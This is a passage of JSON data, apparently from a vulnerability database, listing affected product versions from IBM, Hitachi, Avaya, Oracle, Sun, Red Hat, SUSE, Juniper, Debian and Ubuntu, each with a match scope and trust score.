"ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.2" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "cosminexus developer professional 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.11" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.07" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "cosminexus client 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "fabric manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.00.22" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "runtimes for java technology sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cosminexus developer professional 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "cosminexus developer light 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.52" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "sterling secure proxy ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "cosminexus client 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "web sphere real time service refresh", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "37" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "cosminexus developer professional 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.33" }, { "model": "cosminexus developer 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.29" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.37" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus application server 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.061" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.41" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.42" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.2" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cosminexus application server 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational sap connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.4" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "cosminexus studio 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.9" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "cosminexus application server enterprise 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.05" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.55" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.01" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.06" }, { "model": "runtimes for java technology 7.sr7", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 